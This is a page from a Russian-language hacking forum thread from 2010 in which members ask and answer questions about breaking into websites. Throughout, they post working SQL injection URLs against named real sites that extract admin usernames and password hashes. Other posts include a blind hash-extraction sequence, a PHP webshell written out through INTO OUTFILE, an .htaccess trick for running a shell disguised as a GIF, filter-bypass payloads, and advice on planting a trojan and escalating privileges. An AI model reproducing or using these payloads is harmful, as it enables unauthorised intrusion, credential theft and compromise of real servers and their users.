PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 [56] 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98

GOGA075
11.06.2010, 21:08
Bb0y дай линк почитать, а то я такого не знаю...

FlaktW
11.06.2010, 21:12
FlaktW у тебя же есть логин и пароль от админки...
тут никаких проблем нету..
Это хеш можно два года брутить.

Bb0y
11.06.2010, 21:14
2GOGA075
https://forum.antichat.ru/thread35207.html
https://forum.antichat.ru/thread119047.html
https://www.hackzone.ru/articles/view/id/7925/
тут подробнее от Qwazar http://qwazar.ru/?p=7

qq6ka
12.06.2010, 11:28
Ищу пути. В /etc/init.d/apache есть

APACHE_HOME=/usr/apache
CONF_FILE=/etc/apache/httpd.conf
RUNDIR=/var/run/apache
PIDFILE=${RUNDIR}/httpd.pid
TOMCAT_CF=/var/apache/tomcat/conf/server.xml
TOMCAT55_CF=/var/apache/tomcat55/conf/server.xml

Но!
/etc/apache/httpd.conf, /var/apache/tomcat55/conf/server.xml - не читаются, видимо прав не хватает.

Кто с TOMCAT 5.5 работал, подскажите где ещё посмотреть полезную инфу.

GOGA075
12.06.2010, 13:19
кто подскажет как в это
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,5,6,7,8

воткнут такой запрос
UPDATE `users` SET `user_pwd` = '048bc95b24facd7dc82937fa99e81389' WHERE `id` =6 LIMIT 1 ;

и вообще это реально?

I love this game
12.06.2010, 13:57
есть доступ к админке, через картинки не получилось залить шелл, но можно бекап бд и востановление бд, подскажите какой запрос нужно сделать что бы через востановление бд залить шелл

pinch
12.06.2010, 13:58
заливай .htaccess

I love this game
12.06.2010, 14:01
можно подробнее?

GOGA075
12.06.2010, 14:08
I love this game через восстановление БД тебе нужно знать путь корневой корректории.
а запрос
select '<? assert(stripslashes($_REQUEST[cmd])); ?>' into outfile '/home/WWW/shell.php';

I love this game
12.06.2010, 14:10
Но можно ж вроде через sql открыть phpinfo и оттуда уже узнаю диру?

pinch
12.06.2010, 14:12
пиши в файл .htaccess:
AddHandler application/x-httpd-php .gif

потом заливай свой шелл изменив расширение на gif

GOGA075
12.06.2010, 14:13
phpinfo можно поискать на сервере, ибо некоторые админы его туда зачем то пихают!
через sql можно узнать в том случае если админ не отключил показ ошибок... тогда и покажет дерректорию!

I love this game
12.06.2010, 14:18
Ну вот пример для phpbb UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;
так нельзя сделать?

пиши в файл .htaccess: AddHandler application/x-httpd-php .gif потом заливай свой шелл изменив расширение на gif

а .htaccess как залить?

GOGA075
12.06.2010, 14:19
I love this game я же тебе дал рабочий за запрос...
и для phpbb это не подайдет совсем!!!

pinch
12.06.2010, 14:21
ну если .htaccess не заливается то пиццец этому способу

I love this game
12.06.2010, 14:21
я понял, что мне не поможет от phpbb я просто пример привел, но у ведь путей не знаю, ошибки не показывают!

GOGA075
12.06.2010, 14:26
pinch ну это не сильно распространенный способ!

I love this game попробуй поискать на сервере рhpinfо.php или что то подобное,
а так же советую пошарить на других сайтах этого сервера!
И попробуй переименовать шел в shell.php$20.gif и залить это, может прокатить!

I love this game
12.06.2010, 14:30
Только jpg, но там еще стоит ограничение на размер и вроде переименовывает файл само!

не получлилось

FlaktW
12.06.2010, 20:18
Вопрос! Можно ли вывести из таблицы ADMIN, через information_schema, значения колонок USERNAME,PASSWORD?

id=-11'+union+select+1,concat_ws(0x3a,USERNAME,PASSWOR D),3,4,5,6,7,8,9,10,11,12+from+information_schema. tables+where+table_name=0x41444d494e+--+

CyberHunter
12.06.2010, 20:28
Вопрос! Можно ли вывести из таблицы ADMIN, через information_schema, значения колонок USERNAME,PASSWORD?

id=-11'+union+select+1,concat_ws(0x3a,USERNAME,PASSWOR D),3,4,5,6,7,8,9,10,11,12+from+information_schema. tables+where+table_name=0x41444d494e+--+
Хм.. Странный вопрос. Наверное можно, если там есть такие колонки.

FlaktW
12.06.2010, 20:43
Хм.. Странный вопрос. Наверное можно, если там есть такие колонки.

Колонки такие есть, а запрос не знаю, как составить.

GOGA075
12.06.2010, 20:50
FlaktW
зачем тебе именно через information_schema выводить??
information_schema и есть таблица.. и ничего от туда кроме имен не выведешь...
Проше сделать прямой запрос, чем так извращатся!!

FlaktW
12.06.2010, 21:09
FlaktW
зачем тебе именно через information_schema выводить??
information_schema и есть таблица.. и ничего от туда кроме имен не выведешь...
Проше сделать прямой запрос, чем так извращатся!!

Надо поизвращаться, прямой запрос не проходит!

[Feldmarschall]
12.06.2010, 21:32
FlaktW
information_schema и есть таблица..

не таблица, а содержащая информацию о структуре баз данных.

Farboud
12.06.2010, 21:46
подскажите каким образом реализовать пассивную XSS
usersearch.php?em="><script>alert(/XSS/)</script> в поле Email, я примерно знаю, но никак не получается реализовать, если можно, то попобробней!

jecka3000
12.06.2010, 22:01
подскажите каким образом реализовать пассивную XSS
usersearch.php?em="><script>alert(/XSS/)</script> в поле Email, я примерно знаю, но никак не получается реализовать, если можно, то попобробней!

https://forum.antichat.ru/thread20140.html

Bb0y
12.06.2010, 22:31
2FlaktW, возможно в таблице нет выборки

FlaktW
12.06.2010, 22:51
2FlaktW, возможно в таблице нет выборки

Разобрался, в регистре была причина.

Всем спасибо за помощь!

Irdis
13.06.2010, 00:03
несколько вопросов
1.
section=113+union+select 1 from w
на что получаю ответ.
DB Error: Table 'xxx.w' doesn't exist....
Смысл ошибки понятен, но почему такое странное имя таблицы, если я выбирал из w?

2. .... INTO Outfile char(11,22)
почему это ошибка, char вроде должен возвращать строку

3. server version for the right syntax to use near ''(две кавычки) at line 1
Ответ от БД, если вставляю кавычку в запрос. Почему такое происходит? Есть ли возможность это обойти?

Twoster
13.06.2010, 00:05
Разобрался, в регистре была причина.

Всем спасибо за помощь!
Покажи плиз запрос, которым ты вывел данные.

Konqi
13.06.2010, 00:09
несколько вопросов
1.
section=113+union+select 1 from w
на что получаю ответ.
DB Error: Table 'xxx.w' doesn't exist....
Смысл ошибки понятен, но почему такое странное имя таблицы, если я выбирал из w?

2. .... INTO Outfile char(11,22)
почему это ошибка, char вроде должен возвращать строку

3. server version for the right syntax to use near ''(две кавычки) at line 1
Ответ от БД, если вставляю кавычку в запрос. Почему такое происходит? Есть ли возможность это обойти?

1.xxx это имя текущей базы

2. в запросе into outfile char не катит

3.кавычки фильтруются,синтаксическа ошибка mysql

mailbrush
13.06.2010, 00:12
Konqi, а нажать кнопочку "Edit" религия не позволяет?

PS: FlaktW, насколько я знаю, в MySQL регистр не важен.

v1d0qz
13.06.2010, 00:15
FlaktW
information_schema и есть таблица..
Проше сделать прямой запрос, чем так извращатся!!
\']не таблица, а содержащая информацию о структуре баз данных.
Если быть точнее, то это БД => база данных :)


Вопрос! Можно ли вывести из таблицы ADMIN, через information_schema, значения колонок USERNAME,PASSWORD?

id=-11'+union+select+1,concat_ws(0x3a,USERNAME,PASSWOR D),3,4,5,6,7,8,9,10,11,12+from+information_schema. tables+where+table_name=0x41444d494e+--+

Хм.. Странный вопрос. Наверное можно, если там есть такие колонки.

FlaktW
зачем тебе именно через information_schema выводить??
information_schema и есть таблица.. и ничего от туда кроме имен не выведешь...
Проше сделать прямой запрос, чем так извращатся!!

Надо поизвращаться, прямой запрос не проходит!

Вот эта переписка, вообще как будто из фильма "Чужие 3".
Самое главное пытаются использвать "умные" слова, но по смыслу такой чес получается. А самое печальное, что на глупый вопрос, другие вроде бы не глупые люди (хотя может я ошибаюсь), пытаются найти глупый ответ.

Покажи плиз запрос, которым ты вывел данные.

На баш хочешь? :)

зы. Как я понял, правильный запрос был такой.
union+select+1,concat_ws(0x3a,username,password),3 ,4,5,6,7,8,9,10,11,12+from+admin, т.е. в нижнем регистре. Но то как искали решение, меня просто убило :)

z-kzn-z
13.06.2010, 00:18
подскажите, пожалуйста.
на сервере IIS, и, как я понял, ODBC (вообщем, там MySQL).

myguild.asp?gid=2779-1 - не проходит
myguild.asp?gid=2779' - ошибка:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-5.0.24a]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

/myguild/myguild_common.asp, line 7

myguild.asp?gid=2779+order+by+1/* - проходит
myguild.asp?gid=2779+order+by+1-- - не проходит, т.е. -- фильтрует, а /* нет.

Но когда я делаю такое: myguild.asp?gid=2779+union+select+1/* , сервер выдает алерт:

Alert
Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.

что можно сделать?

Bb0y
13.06.2010, 00:23
2z-kzn-z, https://forum.antichat.ru/thread30501.html
это не MySQL, a MSSQL, другой синтаксис

z-kzn-z
13.06.2010, 00:27
2z-kzn-z, https://forum.antichat.ru/thread30501.html
это не MySQL, a MSSQL, другой синтаксис
хм, а почему тогда
[MySQL][ODBC 3.51 Driver][mysqld-5.0.24a]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1?

Jokester
13.06.2010, 00:31
Значит так, дорогие друзья. Мы тут почитали посты за сегодняшний день, и я решил ужесточить на время летних каникул модерацию данного топика.
В связи с этим знаменательным событием прошу постоянных читателей и писателей думать что вы пишите, а в часности:
Задающим вопросы - воспользоваться поиском и что-то сначала почитать
Отвечающим на вопросы - хорошенько подумать перед ответом. Не нужно показывать свою некомпетентность и писать ОХИНЕЮ отвечая на вопросы, я буду расценивать это как подрыв доверия к форуму в целом (вот такой я наркоман !)

===============================================
Далее, хотелось-бы услышать пояснения к некоторым ответам. В часности:

И попробуй переименовать шел в shell.php$20.gif и залить это, может прокатить!
поясните пожалуйста, что это за конструкция
Хм.. Странный вопрос. Наверное можно, если там есть такие колонки.
вот структура INFORMATION_SCHEMA, где там прячутся те поля, которые он хочет вывести?
http://www.rldp.ru/mysql/mysqlpro/schema.htm
Колонки такие есть, а запрос не знаю, как составить.
то-же самое, где там они, покажите пожалуйста
2FlaktW, возможно в таблице нет выборки
Эээ?
Разобрался, в регистре была причина.
Всем спасибо за помощь!
ЧТО ТУТ ПРОИСХОДИТ??777!!!

===========================

Это подборка только за сегодняшний вечер!

Вобщем если это будет продолжаться, не обижайтесь на меня =\

Bb0y
13.06.2010, 00:35
Действительно. Не дочитал мессагу до конца

v1d0qz
13.06.2010, 00:43
подскажите, пожалуйста.
на сервере IIS, и, как я понял, ODBC (вообщем, там MySQL).

myguild.asp?gid=2779-1 - не проходит
myguild.asp?gid=2779' - ошибка:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-5.0.24a]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

/myguild/myguild_common.asp, line 7

myguild.asp?gid=2779+order+by+1/* - проходит
myguild.asp?gid=2779+order+by+1-- - не проходит, т.е. -- фильтрует, а /* нет.

Но когда я делаю такое: myguild.asp?gid=2779+union+select+1/* , сервер выдает алерт:

Alert
Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.

что можно сделать?

Если ты хочешь скрыть линк, то скрывай как полагается. Лугл палит :(


Именно в этом запросе, что ты указал, крути как UPDATE;

http://hero2.eamobile.co.kr/myguild/myguild.asp?gid=474-1&lid=867&page=1

Сайт ватовый, нашел по быстрому блинд (с выводом нету время искать). Там действительно mysql. Но в теории под игру стоит ещё и mssql.

http://hero2.eamobile.co.kr/community.asp?cid=86488+and+substring(version(),1, 1)=5&page=1

зы. Jokester, теперь я опередил твою мысль. Правда я решил не цитировать Bb0y, вроде как парень старается (в плане на форуме), но видимо не понял что от него хотел ТС, а ты я вижу никого не пожалел. Ну и ладно...

Irdis
13.06.2010, 00:46
3.кавычки фильтруются,синтаксическа ошибка mysql

3. хм... я всегда думал, что кавычки фильтруются на уровне кода, который посылает запросы(а не на уровне БД). А как тогда они составляют запросы, если кавычки не допустимы (понятно что можно обойтись в больших кол-вах случаев и без них, но это же убого)?

z-kzn-z
13.06.2010, 00:46
Если ты хочешь скрыть линк, то скрывай как полагается. Лугл палит :(

Именно в этом запросе, что ты указал, крути как UPDATE;

http://hero2.eamobile.co.kr/myguild/myguild.asp?gid=474-1&lid=867&page=1

Сайт ватовый, нашел по быстрому блинд (с выводом нету время искать). Там действительно mysql. Но в теории под игру стоит ещё и mssql.

http://hero2.eamobile.co.kr/community.asp?cid=86488+and+substring(version(),1, 1)=5&page=1

зы. Jokester, теперь я опередил твою мысль. Правда я решил не цитировать Bb0y, вроде как парень старается, но видимо упустил мысль ТС, а ты я вижу никого не пожалел. Ну и ладно...

да если бы сильно хотел, скрыл бы)
спасибо, буду искать

DeluxeS
13.06.2010, 00:53
//Решено

v1d0qz
13.06.2010, 00:57
Имеем шелл WSO 2.3, подключился к БД MySQL...
Цель: изменить 1 поле , сменить несколько цифр....
http://gyazo.com/fd1f51d574487c7a1bc79e8f1b4f7422.png
Где начинается "Привет.." Это поле и надо изменить, как сделать с помощью данного шелла?
Спасибо.

http://dev.mysql.com/doc/refman/5.0/en/update.html

Все гениальное - просто.

GOGA075
13.06.2010, 01:31
DeluxeS в WSO нет функции изменения, тебе нужен phpmyadmin или што то подобное...

ищи и качай Adminer - Compact MySQL management
хорошая штука!

DeluxeS
13.06.2010, 01:44
DeluxeS в WSO нет функции изменения, тебе нужен phpmyadmin или што то подобное...

ищи и качай Adminer - Compact MySQL management
хорошая штука!
Большое спасибо, отличная вещь, ещё раз спасибо :)

qq6ka
13.06.2010, 10:09
Я сейчас задам тупой вопрос. Залил шелл на Windows NT 5.2. Но процесс повышения прав в Windows - тёмный лес для меня.

Кто может помочь - стукните в аську 3765431-четые-9

FlaktW
13.06.2010, 12:53
Покажи плиз запрос, которым ты вывел данные.

Браузер вывел следующие таблицы:

www.site.com/abstract.php?abstract=-1531'+union+select+1,group_concat(0x0b,table_name) ,3,4,5,6,7,8,9,10,11,12+from+information_schema.ta bles+--+

ADMIN,
ALERT,
AUTHORS,
EDITORS,
IPS,
MYPICS,
ONLINE,
ORDERS,
PAGES,

Все таблицы в верхнем регистре.


При таком запросе ничего не выводится.

www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11, 12+from+ADMIN+--+

Вводим имя таблицы в нижний регистре, все выводится.

www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11, 12+from+admin+--+

Ctacok
13.06.2010, 15:44
Браузер вывел следующие таблицы:

www.site.com/abstract.php?abstract=-1531'+union+select+1,group_concat(0x0b,table_name) ,3,4,5,6,7,8,9,10,11,12+from+information_schema.ta bles+--+

ADMIN,
ALERT,
AUTHORS,
EDITORS,
IPS,
MYPICS,
ONLINE,
ORDERS,
PAGES,

Все таблицы в верхнем регистре.


При таком запросе ничего не выводится.

www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11, 12+from+ADMIN+--+

Вводим имя таблицы в нижний регистре, все выводится.

www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11, 12+from+admin+--+
А ты недумал что например, в css стоит что все слова под определённым дивом определённого размера? (Т.е. в верхнем, что в нижнем текст одинаковый).

Pashkela
13.06.2010, 15:50
PS: FlaktW, насколько я знаю, в MySQL регистр не важен.

Важен, зайди в phpmyadmin и набери:

select user from mysql.USER

и сразу станет понятно

Iceangel_
13.06.2010, 16:04
Важен, зайди в phpmyadmin и набери:

select user from mysql.USER

и сразу станет понятно
зашел и все норм вывело ;)

Вообще, чувствительность к регистру(при указании имени базы или таблицы) у мускула зависит от платформы. В большинстве случаев, в Linux регистр играет роль, в Windows и Mac OS напротив.

Pashkela
13.06.2010, 16:06
2 Iceangel_:

Согласен

FlaktW
13.06.2010, 16:29
зашел и все норм вывело ;)

Вообще, чувствительность к регистру(при указании имени базы или таблицы) у мускула зависит от платформы. В большинстве случаев, в Linux регистр играет роль, в Windows и Mac OS напротив.

Вот инфа этого сайта. Линк дать немогу, так как сайт очень интересный.

5.0.51A:REWER:REWER@LOCALHOST:SUSE-LINUX-GNU

POloid
13.06.2010, 16:33
кто подскажет как в это
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,5,6,7,8

воткнут такой запрос
UPDATE `users` SET `user_pwd` = '048bc95b24facd7dc82937fa99e81389' WHERE `id` =6 LIMIT 1 ;

и вообще это реально?

Bb0y
13.06.2010, 16:42
2POloid
http://www.rsgt.com/press_releases1_more.php?id=19+and+substring(@@ver sion,1,1)=5+--
крути как blind

http://www.rsgt.com/press_releases1_more.php?id=19+AND+ascii(lower(sub string((select+user_pwd+from+users),1,1)))%3E52+-- => первый символ хэша = "5"
http://www.rsgt.com/press_releases1_more.php?id=19+AND+ascii(lower(sub string((select+user_pwd+from+users),2,1)))%3E101+-- => второй символ хэша = "f"
и т.д.

Ctacok
13.06.2010, 16:58
2POloid
http://www.rsgt.com/press_releases1_more.php?id=19+and+substring(@@ver sion,1,1)=5+--
крути как blind

http://www.rsgt.com/press_releases1_more.php?id=19+AND+ascii(lower(sub string((select+user_pwd+from+users),1,1)))%3E52+-- => первый символ хэша = "5"
http://www.rsgt.com/press_releases1_more.php?id=19+AND+ascii(lower(sub string((select+user_pwd+from+users),2,1)))%3E101+-- => второй символ хэша = "f"
и т.д.
Не, ну это не по пацански.
http://www.rsgt.com/press_releases1_more.php?id=-19+or(1,1)=(select+count(0),concat((select+user_pw d+from+users+limit+0,1),floor(rand(0)*2))from(info rmation_schema.tables)group+by+2)--+
5f0210ed3fa1e3301e5fac5928cc9712

Стоп, я тоже мудак дезинформатор.
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,unhex(hex(concat_ws(0x3a,user_ pwd))),4,5,6,7,8+from+users

2 Ruller, я заметил что там блайнд, вот и начал выпендриваться. А токо ща заметил что там обыкновенная скуля. (Без твоего поста (!) )

RulleR
13.06.2010, 17:07
Bb0y, Ctacok WTF?!
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,aes_decrypt(aes_encrypt(us er_pwd,1),1),6,7,8+from+usersкто подскажет как в это
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,5,6,7,8

воткнут такой запрос
UPDATE `users` SET `user_pwd` = '048bc95b24facd7dc82937fa99e81389' WHERE `id` =6 LIMIT 1 ;

и вообще это реально?нет

GOGA075
13.06.2010, 17:14
Bb0y ты видишь функцию UPDATE, речь идет не о извлечении хеша из БД, а изменении его с помощью запроса!!

pinch
13.06.2010, 17:23
даа видно все сходят с ума

v1d0qz
13.06.2010, 18:16
Эммм....Вывели 3-ма разными способами 1 скулю... Очень оригинально.. Завтра он задаст такой же вопрос, только уже в другом месте. Одни понты :(

Вот инфа этого сайта. Линк дать немогу, так как сайт очень интересный.

5.0.51A:REWER:REWER@LOCALHOST:SUSE-LINUX-GNU

Нy просто о_Oчень интересный сайт... Продавай шелл > покупай квартиру.
http://www.eje.cz/scripts/viewabstract.php?abstract=-1531'+union+select+group_concat(jmeno,0x3a,passwor d),2,3,4,5,6,7,8,9,10,11,12+from+admin--+
=> 101111 1100001 1100100 1101101 1101001 1101110 1110011 101111

qq6ka
13.06.2010, 18:46
Я сейчас задам тупой вопрос. Залил шелл на Windows NT 5.2. Но процесс повышения прав в Windows - тёмный лес для меня.

Кто может помочь - стукните в аську 3765431-четые-9

актуально.

попугай
13.06.2010, 19:32
актуально.


Смотря какой вебсервер. Если Apache, то обычно его пускают от системного юзверя - можно телнет открыть или даже RemoteDesctop. Если IIS, то права обычно обрезаны по максимуму, а новых сплойтов почти и нет в паблике.

qq6ka
13.06.2010, 19:57
Смотря какой вебсервер. Если Apache, то обычно его пускают от системного юзверя - можно телнет открыть или даже RemoteDesctop. Если IIS, то права обычно обрезаны по максимуму, а новых сплойтов почти и нет в паблике.


Microsoft-IIS/6.0

Правки файлов сайтов нет. Могу диски смотреть, править файлы в корне C:\. Всё через ж***, короче.

DrakonSerg
13.06.2010, 20:12
Apache/1.3.27 (Unix) (Red-Hat/Linux) FrontPage/5.0.2.2626 mod_ssl/2.8.12 OpenSSL/0.9.6b PHP/4.3.11 mod_perl/1.27 - вот такая система есть у меня. Апач довольно старый, подозреваю, что есть сплойты под него. Только найти не могу.
фтп - Version wu-2.6.2(1)
ssh - SSH-1.99-OpenSSH_3.1p1
подкиньте идейку или рабочий сплойт. В идеале мне нужна MySQL база, но мскл инъекций на сайте не обнаружено. Если достану базу - отблагодарю

попугай
13.06.2010, 20:26
Microsoft-IIS/6.0

Правки файлов сайтов нет. Могу диски смотреть, править файлы в корне C:\. Всё через ж***, короче.


Попробуй в корень диска C:/ троян записать. Вдруг админ решит запустить. Или autoexec поправить.

exT1ma4ka
13.06.2010, 20:37
подскажите пожалуйста как залить шелл.

ситуация такая: mysql стоит на одной машинке, сайт на другой (хостинг) - есть sql-inj дырка. INTO OUTFILE применить не получится исходя из выше-сказанного (mysql на отдельной машине).

по крайней мере пытался, но пишет:

Error 1: Can't create/write to file '/var/www/пам/data/www/парам/uploads/shell.php' (Errcode: 2)

FlaktW
13.06.2010, 20:37
Фильтруется select, как обойти?

http://www.albumband.cz/pisen.php?id=1+union+select+1,2,3,4,5,6,7+--+

qq6ka
13.06.2010, 20:42
Попробуй в корень диска C:/ троян записать. Вдруг админ решит запустить. Или autoexec поправить.

Ну в теории можно залить ***.exe в веб-папку + правка C:\AUTOEXEC.BAT возможна. Только это нужно троя искать/покупать не палящегося + заставить админа перезагрузить сервер.

Попугай, тебе не нужен шелл? Мне лень возиться.

Pashkela
13.06.2010, 20:53
Фильтруется select, как обойти?

http://www.albumband.cz/pisen.php?id=1+union+select+1,2,3,4,5,6,7+--+

select не фильтруется:


http://www.albumband.cz/pisen.php?id=1+and+substring((select+version()),1, 1)=5


фильтруется кое-что другое ;)

RulleR
13.06.2010, 23:18
Фильтруется select, как обойти?

http://www.albumband.cz/pisen.php?id=1+union+select+1,2,3,4,5,6,7+--+http://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,8upd: + читалка файлов в 8 полеhttp://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,0x2e2e2f706 973656e2e706870

FlaktW
14.06.2010, 12:23
http://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,8upd: + читалка файлов в 8 полеhttp://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,0x2e2e2f706 973656e2e706870

Буду обращаться к вам за советами.

GOGA075
14.06.2010, 13:25
помогите расскрутить это
http://www.hausderkunst.de/hdk.de/index.php?StoryID=-999999

Konqi
14.06.2010, 13:49
ребят вот такой вопрос :

имеется сервер Microsoft-IIS/7.0, язык asp

База : PostgreSQL

через функции Postgre хотел читать файл C:\boot.ini,файл не открылся..(strange strange strange)

просто из за интереса попробовал читать файл /etc/passwd (ну я знаю что в винде такого нету)

и файл открылся!!

как это понять?

реально ли использовать IIS под никcом??

SeNaP
14.06.2010, 13:50
помогите расскрутить это
http://www.hausderkunst.de/hdk.de/index.php?StoryID=-999999
http://www.hausderkunst.de/hdk.de/index.php?StoryID=-2+union+select+TABLE_NAME+from+INFORMATION_SCHEMA. TABLES+limit+1,1--
Перебирай limit'ом

pinch
14.06.2010, 13:54
как узнать полный путь в никсе имеется возможность читать файлы sql запросом?

wildshaman
14.06.2010, 14:10
как узнать полный путь в никсе имеется возможность читать файлы sql запросом?
google.ru
site:yourvulnsite.com warning

И в найденных ошибках будет путь

pinch
14.06.2010, 14:13
вывод ошибок отключен + через google пробовал

wildshaman
14.06.2010, 14:14
Попробовать найти phpinfo, пооткрывать просто .php файлы без параметров, попроболвать найти раскрытие путей - [] и так далее

pinch
14.06.2010, 14:15
сайт на asp, инклуда нет раскрытие тож

qq6ka
14.06.2010, 14:16
как узнать полный путь в никсе имеется возможность читать файлы sql запросом?

читай конфиги. Вот тема https://forum.antichat.ru/threadnav49775-4-10.html

Konqi
14.06.2010, 14:16
Попробовать найти phpinfo, пооткрывать просто .php файлы без параметров, попроболвать найти раскрытие путей - [] и так далее

шаман это тот самый сайт o котором я писал выше,сайт на asp, нужно узнать полный путь чтоб залить шелл

Ctacok
14.06.2010, 15:32
ребят вот такой вопрос :

имеется сервер Microsoft-IIS/7.0, язык asp

База : PostgreSQL

через функции Postgre хотел читать файл C:\boot.ini,файл не открылся..(strange strange strange)

просто из за интереса попробовал читать файл /etc/passwd (ну я знаю что в винде такого нету)

и файл открылся!!

как это понять?

реально ли использовать IIS под никcом??
Ты сам себе ответил.
Фильтруется select, как обойти?

http://www.albumband.cz/pisen.php?id=1+union+select+1,2,3,4,5,6,7+--+
http://www.albumband.cz/mysql.cfg
:D Давно такого не видел :)

Konqi
14.06.2010, 17:00
Ctacok что предлагаешь? можно как-нибудь узнать путь до сайта?

Konqi
14.06.2010, 17:27
попробуй удаленно подрубится.

можно по конкретнее :)

Konqi
14.06.2010, 17:31
пхп май админ поищи, или попытайся удаленно подключится к мускулу...

там Postgre :)

Ctacok
14.06.2010, 17:48
Ctacok что предлагаешь? можно как-нибудь узнать путь до сайта?
Дак там же ошибка есть, /web/htdocs/albumbandcz/www/pisen.php

Konqi
14.06.2010, 17:55
Дак там же ошибка есть, /web/htdocs/albumbandcz/www/pisen.php


man ты а каком сайте говоришь? я вроде не постил имя сайта :)

Ctacok
14.06.2010, 17:57
man ты а каком сайте говоришь? я вроде не постил имя сайта :)
-----ЭТО ИЗОБРАЖЕНИЕ-----
http://gyazo.com/1f93b413c233da5e309f4247ef61c132.png
-----ЭТО ИЗОБРАЖЕНИЕ-----
Да и я вроде не тебе писал про тот сайт ;)
Скинь адрес сайта в личку, гляну.

попугай
14.06.2010, 18:09
ребят вот такой вопрос :

имеется сервер Microsoft-IIS/7.0, язык asp

База : PostgreSQL

через функции Postgre хотел читать файл C:\boot.ini,файл не открылся..(strange strange strange)

просто из за интереса попробовал читать файл /etc/passwd (ну я знаю что в винде такого нету)

и файл открылся!!

как это понять?

реально ли использовать IIS под никcом??


Postgres на другом серваке работает, наверное.

Konqi
14.06.2010, 18:24
Postgres на другом серваке работает, наверное.

попугай здесь проблема не в этом, в админку не входит (403) , остается версия шелла..

на сервере других сайтов нету,вывод ошибок отключено..

можно ли узнать полный путь до сайта?


Скинь адрес сайта в личку, гляну

oga

EoGeneo
14.06.2010, 18:43
http://www.zone403.ru/club.php?id=-100 - помогите скулю крутануть

GOGA075
14.06.2010, 20:54
Почему запрос к MsSql &Pd=1+or+1=@@version проходит
а &Pd=1+or+1=(select db_name())
уже нет???
ничего не выдает и редирект сразу!

Bb0y
14.06.2010, 21:08
2GOGA075, Возможно скобки фильтруются
2EoGeneo, хм, скули не вижу

GOGA075
14.06.2010, 21:12
Bb0y как это можно обойти??
И когда делаю запрос &Pd=1+or+1=()
редиректа нету, я не думаю что все таки фильтруются!!

Bb0y
14.06.2010, 21:16
2GOGA075, скинь линк в лс, посмотрю

Ctacok
14.06.2010, 21:43
Почему запрос к MsSql &Pd=1+or+1=@@version проходит
а &Pd=1+or+1=(select db_name())
уже нет???
ничего не выдает и редирект сразу!
Да select фильтруется.
Если не скобки, то что ещё там может фильтроваться? seLEcT попробуй вбить. // Постом отправить.

GOGA075
14.06.2010, 21:53
Ctacok Смена больших и маленьких букв не помогла, все равно переносит на главную!

BlackFan
14.06.2010, 22:03
Эксперементирую с group by rand()...

На 5 версии
select count(0) from table group by concat(version(),x)x = floor(rand(0)*2) или rand(0)|0 или rand(0)&1 или rand()^0
выдает Duplicate entry
x = rand(0)
выполняется без ошибок.

Решил проверить на 4 версии. (Проверял на сайте http://decanat5.ssau.ru/search_student в sql-inj)
И вот тут результаты просто поставили в ступор
' union select 1,count(*),3 from student group by concat(version(),rand(0))/*Выдает Duplicate entry, а
' union select 1,count(*),3 from student group by concat((select 1),rand(0))/*нет. В то время как
' union select 1,count(*),3 from student group by concat(version(),(select 1),rand(0))/*выдает Duplicate entry, а
' union select 1,count(*),3 from student group by concat(version(),(select studentid from student limit 1),rand(0))/*нет.

Так вот вопрос)
1) Почему на 4 версии иногда прокатывает с rand(0), а на 5, сколько не пытался, так и не получилось
2) Почему с floor(rand(0)*2) прокатывает всегда, а с теми же rand(0)|0 работает только на 5 версии
3) Почему вот такой запрос не выдает ошибку, не смотря на то что там floor(rand(0)*2)
' and (1) = (select count(*) from student group by floor(rand(0)*2))/*

jecka3000
14.06.2010, 22:03
GOGA075, пробуй что то типа этого:

?id=(1)and(1)=(0)union(select(null),table_name,(nu ll)from(information_schema.tables)limit 28,1--)

GOGA075
14.06.2010, 22:08
jecka3000 тоже никакой реакции...

EoGeneo
14.06.2010, 23:11
Парни, дайте покурить маны по поводу заливки шшела в булку 3.8.4

v1d0qz
14.06.2010, 23:46
Эксперементирую с group by rand()...

На 5 версии
select count(0) from table group by concat(version(),x)x = floor(rand(0)*2) или rand(0)|0 или rand(0)&1 или rand()^0
выдает Duplicate entry
x = rand(0)
выполняется без ошибок.

Решил проверить на 4 версии. (Проверял на сайте http://decanat5.ssau.ru/search_student в sql-inj)
И вот тут результаты просто поставили в ступор
' union select 1,count(*),3 from student group by concat(version(),rand(0))/*Выдает Duplicate entry, а
' union select 1,count(*),3 from student group by concat((select 1),rand(0))/*нет. В то время как
' union select 1,count(*),3 from student group by concat(version(),(select 1),rand(0))/*выдает Duplicate entry, а
